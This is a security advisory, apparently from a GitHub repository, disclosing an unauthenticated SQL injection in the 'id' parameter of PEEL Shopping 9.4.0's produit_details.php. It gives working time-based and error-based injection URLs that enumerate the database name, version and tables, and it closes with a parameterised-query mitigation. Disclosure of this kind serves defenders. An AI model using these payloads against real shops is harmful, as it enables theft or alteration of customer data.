Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Vulnerability Name: SQL Injection in "produit_details.php?id" parameter

Date of Discovery: 10 July 2021

Product version: 9.4.0 . Download link

Author: faisalfs10x

Vulnerability Description: Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.

Vulnerable URL: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]

Proof of Concept:

1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)

[PoC enum db name] enum_dbname

2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)

[Poc enum MariaDB] enum_dbversion(MariaDB)

3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)

[PoC enum table peel_produits] enum_tablename

To produce SQL syntax error, it is possible to intercept the request before it is redirect to homepage using a tool like BurpSuite (repeater).

Error syntax: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELdECT(SLEEP(3-(IF(USER()+LIKE+0xGEN_ERROR,0,5)))))ERR)

  1. [MariaDB disclosed image] sql_error_mariadb

  2. [peel_produits table_name disclosed] sql_errorbased2

Dump table name = peel_profil

dump_table_peel_profil

Consequences:

  • Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities.
  • Integrity: Just as it may be possible to read sensitive information eg client/customer sensitive data, it is also possible to make changes or even delete this information with a SQL Injection attack.

Mitigation: Use of Prepared Statements (with Parameterized Queries). It would be good also to casting integer to ensure only numerical data is inserted in 'id' parameter eg - intval($_GET['id'])

References for Mitigation Vulnerability: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

References: